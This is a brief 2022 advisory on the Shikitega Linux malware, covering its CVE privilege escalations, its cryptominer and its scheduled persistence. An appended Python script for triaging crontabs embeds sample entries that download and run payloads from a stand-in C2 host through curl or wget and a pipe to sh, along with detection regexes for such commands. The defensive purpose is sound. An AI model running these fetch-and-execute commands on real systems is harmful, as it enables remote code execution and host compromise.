New Shikitega Malware Targeting Linux Servers & Internet-of-Things
13 September 2022
A new Linux malware, dubbed Shikitega, is reportedly targeting both traditional servers and smaller Internet-of-Things (IoT) devices. It avoids detection by gradually delivering partial payloads with multiple decoding loops and having its command-and-control (C2) servers hosted on legitimate cloud services.
Shikitega has been observed to create a list of commands to be executed at a specified time to achieve persistence while remaining hidden. One such instance is the exploitation of two known privilege escalation Linux vulnerabilities, CVE-2021-4034 and CVE-2021-3493, to download, install, and execute a cryptominer with root privileges, before removing all downloaded files at a predetermined time. On top of that, Shikitega also downloads a Metasploit package, Mettle, which could potentially grant an attacker additional capabilities, including webcam control, credential stealing and multiple reverse shells.
Administrators and users are advised to apply software and firmware updates promptly whenever they are released. Should you suspect that a device is infected, you may wish to perform a scan using an updated anti-malware application. For a suspected infection on an IoT device, the firmware may first have to be extracted so that the anti-malware scan can be run over the contents of the extracted file system. Possible indicators of compromise (IOCs) associated with Shikitega are shown in the table below:
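As an added example, not taken from this advisory or the AT&T report, the following Python triage script flags crontab entries of the kind described above: scheduled commands that fetch and run a payload from a download tool or a world-writable directory, or that delete files at a fixed time. The crontab content and the host c2.example.invalid are constructed for illustration.

```python
import re
from typing import List, Tuple

# Constructed sample crontab (not from the advisory). Lines 3-5 mimic the
# behaviour described: fetch-and-run on a schedule, then a timed cleanup.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://c2.example.invalid/x.sh | sh
30 4 * * * wget -qO /tmp/.m http://c2.example.invalid/m && chmod +x /tmp/.m && /tmp/.m
0 6 * * * rm -rf /tmp/.m /tmp/x.sh
@reboot /usr/local/bin/backup.sh
"""

DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget|tftp)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
WORLD_WRITABLE = re.compile(r"(^|[\s&;])(/tmp|/dev/shm|/var/tmp)/\S+")
FORCED_DELETE = re.compile(r"\brm\s+-[a-zA-Z]*f")


def split_entry(line: str) -> Tuple[str, str]:
    """Return (schedule, command) for one crontab line, including @reboot-style specs."""
    if line.startswith("@"):
        spec, _, cmd = line.partition(" ")
        return spec, cmd.strip()
    fields = line.split(None, 5)
    if len(fields) < 6:
        return line, ""
    return " ".join(fields[:5]), fields[5]


def audit_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, reasons) for every entry matching a suspicious pattern."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        schedule, cmd = split_entry(line)
        reasons = []
        if DOWNLOAD_TOOLS.search(cmd):
            reasons.append("download tool")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("piped to shell")
        if WORLD_WRITABLE.search(cmd):
            reasons.append("references world-writable dir")
        if FORCED_DELETE.search(cmd):
            reasons.append("forced delete")
        if reasons:
            findings.append((schedule, ", ".join(reasons)))
    return findings
```

On a real host, feed the script the output of `crontab -l` for each user and the contents of /etc/crontab and /etc/cron.d; a match is a lead for manual review, not proof of infection.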
Indicators of compromise
IOCs derived from AT&T report
More information is available here:
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux